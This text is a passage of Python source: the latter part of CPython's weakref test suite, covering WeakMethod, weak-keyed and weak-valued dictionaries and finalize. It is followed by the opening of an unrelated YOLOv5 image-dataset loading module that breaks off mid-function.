r = weakref.WeakMethod(o.some_method)
del o
gc.collect()
self.assertIs(r(), None)
def test_method_dead(self):
C = self._subclass()
o = C(1)
r = weakref.WeakMethod(o.some_method)
del C.some_method
gc.collect()
self.assertIs(r(), None)
def test_callback_when_object_dead(self):
# Test callback behaviour when object dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del o
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
C.some_method = Object.some_method
gc.collect()
self.assertEqual(calls, [r])
def test_callback_when_method_dead(self):
# Test callback behaviour when method dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del C.some_method
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
del o
gc.collect()
self.assertEqual(calls, [r])
@support.cpython_only
def test_no_cycles(self):
# A WeakMethod doesn't create any reference cycle to itself.
o = Object(1)
def cb(_):
pass
r = weakref.WeakMethod(o.some_method, cb)
wr = weakref.ref(r)
del r
self.assertIs(wr(), None)
def test_equality(self):
def _eq(a, b):
self.assertTrue(a == b)
self.assertFalse(a != b)
def _ne(a, b):
self.assertTrue(a != b)
self.assertFalse(a == b)
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(x.other_method)
d = weakref.WeakMethod(y.other_method)
# Objects equal, same method
_eq(a, b)
_eq(c, d)
# Objects equal, different method
_ne(a, c)
_ne(a, d)
_ne(b, c)
_ne(b, d)
# Objects unequal, same or different method
z = Object(2)
e = weakref.WeakMethod(z.some_method)
f = weakref.WeakMethod(z.other_method)
_ne(a, e)
_ne(a, f)
_ne(b, e)
_ne(b, f)
del x, y, z
gc.collect()
# Dead WeakMethods compare by identity
refs = a, b, c, d, e, f
for q in refs:
for r in refs:
self.assertEqual(q == r, q is r)
self.assertEqual(q != r, q is not r)
def test_hashing(self):
# Alive WeakMethods are hashable if the underlying object is
# hashable.
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(y.other_method)
# Since WeakMethod objects are equal, the hashes should be equal.
self.assertEqual(hash(a), hash(b))
ha = hash(a)
# Dead WeakMethods retain their old hash value
del x, y
gc.collect()
self.assertEqual(hash(a), ha)
self.assertEqual(hash(b), ha)
# If it wasn't hashed when alive, a dead WeakMethod cannot be hashed.
self.assertRaises(TypeError, hash, c)
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
# Keep an iterator alive
it = dct.items()
try:
next(it)
except StopIteration:
pass
del items
gc.collect()
n1 = len(dct)
del it
gc.collect()
n2 = len(dct)
# one item may be kept alive inside the iterator
self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda k: (1, k))
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.items()
try:
next(it)
except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = list(dict.items())
items2 = list(dict.copy().items())
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), self.COUNT - 1,
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
self.assertRaises(KeyError, dict.__getitem__, 2)
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), k in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test iterkeyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.keyrefs())), len(objects))
for wr in dict.keyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = list(dict.items())
for item in dict.items():
items.remove(item)
self.assertFalse(items, "items() did not touch all items")
# key iterator, via __iter__():
keys = list(dict.keys())
for k in dict:
keys.remove(k)
self.assertFalse(keys, "__iter__() did not touch all keys")
# key iterator, via iterkeys():
keys = list(dict.keys())
for k in dict.keys():
keys.remove(k)
self.assertFalse(keys, "iterkeys() did not touch all keys")
# value iterator:
values = list(dict.values())
for v in dict.values():
values.remove(v)
self.assertFalse(values,
"itervalues() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.pop, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def check_weak_del_and_len_while_iterating(self, dict, testcontext):
# Check that len() works when both iterating and removing keys
# explicitly through various means (.pop(), .clear()...), while
# implicit mutation is deferred because an iterator is alive.
# (each call to testcontext() should schedule one item for removal
# for this test to work properly)
o = Object(123456)
with testcontext():
n = len(dict)
# Since underlaying dict is ordered, first item is popped
dict.pop(next(dict.keys()))
self.assertEqual(len(dict), n - 1)
dict[o] = o
self.assertEqual(len(dict), n)
# last item in objects is removed from dict in context shutdown
with testcontext():
self.assertEqual(len(dict), n - 1)
# Then, (o, o) is popped
dict.popitem()
self.assertEqual(len(dict), n - 2)
with testcontext():
self.assertEqual(len(dict), n - 3)
del dict[next(dict.keys())]
self.assertEqual(len(dict), n - 4)
with testcontext():
self.assertEqual(len(dict), n - 5)
dict.popitem()
self.assertEqual(len(dict), n - 6)
with testcontext():
dict.clear()
self.assertEqual(len(dict), 0)
self.assertEqual(len(dict), 0)
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'keyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
# Issue #21173: len() fragile when keys are both implicitly and
# explicitly removed.
dict, objects = self.make_weak_keyed_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
self.check_weak_destroy_while_iterating(dict, objects, 'valuerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
dict, objects = self.make_weak_valued_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_from_weak_valued_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
dict2 = weakref.WeakValueDictionary(dict)
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), k in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict, "mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict, "original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(list(d.keys()), [o2])
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(list(d.items()), [('something else', o2)])
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
self.assertRaises(KeyError, d.__getitem__, o)
# If a key isn't of a weakly referencable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
# Find the order in which iterkeys sees the keys.
objs = list(d.keys())
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time through the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_make_weak_valued_dict_repr(self):
dict = weakref.WeakValueDictionary()
self.assertRegex(repr(dict), '<WeakValueDictionary at 0x.*>')
def test_make_weak_keyed_dict_repr(self):
dict = weakref.WeakKeyDictionary()
self.assertRegex(repr(dict), '<WeakKeyDictionary at 0x.*>')
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
def check_threaded_weak_dict_copy(self, type_, deepcopy):
# `type_` should be either WeakKeyDictionary or WeakValueDictionary.
# `deepcopy` should be either True or False.
exc = []
class DummyKey:
def __init__(self, ctr):
self.ctr = ctr
class DummyValue:
def __init__(self, ctr):
self.ctr = ctr
def dict_copy(d, exc):
try:
if deepcopy is True:
_ = copy.deepcopy(d)
else:
_ = d.copy()
except Exception as ex:
exc.append(ex)
def pop_and_collect(lst):
gc_ctr = 0
while lst:
i = random.randint(0, len(lst) - 1)
gc_ctr += 1
lst.pop(i)
if gc_ctr % 10000 == 0:
gc.collect() # just in case
self.assertIn(type_, (weakref.WeakKeyDictionary, weakref.WeakValueDictionary))
d = type_()
keys = []
values = []
# Initialize d with many entries
for i in range(70000):
k, v = DummyKey(i), DummyValue(i)
keys.append(k)
values.append(v)
d[k] = v
del k
del v
t_copy = threading.Thread(target=dict_copy, args=(d, exc,))
if type_ is weakref.WeakKeyDictionary:
t_collect = threading.Thread(target=pop_and_collect, args=(keys,))
else: # weakref.WeakValueDictionary
t_collect = threading.Thread(target=pop_and_collect, args=(values,))
t_copy.start()
t_collect.start()
t_copy.join()
t_collect.join()
# Test exceptions
if exc:
raise exc[0]
def test_threaded_weak_key_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, False)
def test_threaded_weak_key_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, True)
def test_threaded_weak_value_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, False)
def test_threaded_weak_value_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, True)
@support.cpython_only
def test_remove_closure(self):
d = weakref.WeakValueDictionary()
self.assertIsNone(d._remove.__closure__)
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakValueDictionary conforms to the mapping protocol"""
__ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
type2test = weakref.WeakValueDictionary
def _reference(self):
return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakKeyDictionary conforms to the mapping protocol"""
__ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
type2test = weakref.WeakKeyDictionary
def _reference(self):
return self.__ref.copy()
class FinalizeTestCase(unittest.TestCase):
class A:
pass
def _collect_if_necessary(self):
# we create no ref-cycles so in CPython no gc should be needed
if sys.implementation.name != 'cpython':
support.gc_collect()
def test_finalize(self):
def add(x,y,z):
res.append(x + y + z)
return x + y + z
a = self.A()
res = []
f = weakref.finalize(a, add, 67, 43, z=89)
self.assertEqual(f.alive, True)
self.assertEqual(f.peek(), (a, add, (67,43), {'z':89}))
self.assertEqual(f(), 199)
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
res = []
f = weakref.finalize(a, add, 67, 43, 89)
self.assertEqual(f.peek(), (a, add, (67,43,89), {}))
self.assertEqual(f.detach(), (a, add, (67,43,89), {}))
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [])
res = []
f = weakref.finalize(a, add, x=67, y=43, z=89)
del a
self._collect_if_necessary()
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
def test_arg_errors(self):
def fin(*args, **kwargs):
res.append((args, kwargs))
a = self.A()
res = []
f = weakref.finalize(a, fin, 1, 2, func=3, obj=4)
self.assertEqual(f.peek(), (a, fin, (1, 2), {'func': 3, 'obj': 4}))
f()
self.assertEqual(res, [((1, 2), {'func': 3, 'obj': 4})])
res = []
with self.assertWarns(DeprecationWarning):
f = weakref.finalize(a, func=fin, arg=1)
self.assertEqual(f.peek(), (a, fin, (), {'arg': 1}))
f()
self.assertEqual(res, [((), {'arg': 1})])
res = []
with self.assertWarns(DeprecationWarning):
f = weakref.finalize(obj=a, func=fin, arg=1)
self.assertEqual(f.peek(), (a, fin, (), {'arg': 1}))
f()
self.assertEqual(res, [((), {'arg': 1})])
self.assertRaises(TypeError, weakref.finalize, a)
self.assertRaises(TypeError, weakref.finalize)
def test_order(self):
a = self.A()
res = []
f1 = weakref.finalize(a, res.append, 'f1')
f2 = weakref.finalize(a, res.append, 'f2')
f3 = weakref.finalize(a, res.append, 'f3')
f4 = weakref.finalize(a, res.append, 'f4')
f5 = weakref.finalize(a, res.append, 'f5')
# make sure finalizers can keep themselves alive
del f1, f4
self.assertTrue(f2.alive)
self.assertTrue(f3.alive)
self.assertTrue(f5.alive)
self.assertTrue(f5.detach())
self.assertFalse(f5.alive)
f5() # nothing because previously unregistered
res.append('A')
f3() # => res.append('f3')
self.assertFalse(f3.alive)
res.append('B')
f3() # nothing because previously called
res.append('C')
del a
self._collect_if_necessary()
# => res.append('f4')
# => res.append('f2')
# => res.append('f1')
self.assertFalse(f2.alive)
res.append('D')
f2() # nothing because previously called by gc
expected = ['A', 'f3', 'B', 'C', 'f4', 'f2', 'f1', 'D']
self.assertEqual(res, expected)
def test_all_freed(self):
# we want a weakrefable subclass of weakref.finalize
class MyFinalizer(weakref.finalize):
pass
a = self.A()
res = []
def callback():
res.append(123)
f = MyFinalizer(a, callback)
wr_callback = weakref.ref(callback)
wr_f = weakref.ref(f)
del callback, f
self.assertIsNotNone(wr_callback())
self.assertIsNotNone(wr_f())
del a
self._collect_if_necessary()
self.assertIsNone(wr_callback())
self.assertIsNone(wr_f())
self.assertEqual(res, [123])
@classmethod
def run_in_child(cls):
def error():
# Create an atexit finalizer from inside a finalizer called
# at exit. This should be the next to be run.
g1 = weakref.finalize(cls, print, 'g1')
print('f3 error')
1/0
# cls should stay alive till atexit callbacks run
f1 = weakref.finalize(cls, print, 'f1', _global_var)
f2 = weakref.finalize(cls, print, 'f2', _global_var)
f3 = weakref.finalize(cls, error)
f4 = weakref.finalize(cls, print, 'f4', _global_var)
assert f1.atexit == True
f2.atexit = False
assert f3.atexit == True
assert f4.atexit == True
def test_atexit(self):
prog = ('from test.test_weakref import FinalizeTestCase;'+
'FinalizeTestCase.run_in_child()')
rc, out, err = script_helper.assert_python_ok('-c', prog)
out = out.decode('ascii').splitlines()
self.assertEqual(out, ['f4 foobar', 'f3 error', 'g1', 'f1 foobar'])
self.assertTrue(b'ZeroDivisionError' in err)
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referencable
>>> r = weakref.ref(obj)
>>> print(r() is obj)
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> print(r())
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super().__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.items():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super().__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> try:
... id2obj(a_id)
... except KeyError:
... print('OK')
... else:
... print('WeakValueDictionary error')
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
support.run_unittest(
ReferencesTestCase,
WeakMethodTestCase,
MappingTestCase,
WeakValueDictionaryTestCase,
WeakKeyDictionaryTestCase,
SubclassableWeakrefTestCase,
FinalizeTestCase,
)
support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from .general import xyxy2xywh, xywh2xyxy, torch_distributed_zero_first
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.tiff', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache.
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
rank=rank)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
dataloader = InfiniteDataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn) # torch.utils.data.DataLoader()
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers.
Uses same syntax as vanilla DataLoader.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever.
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
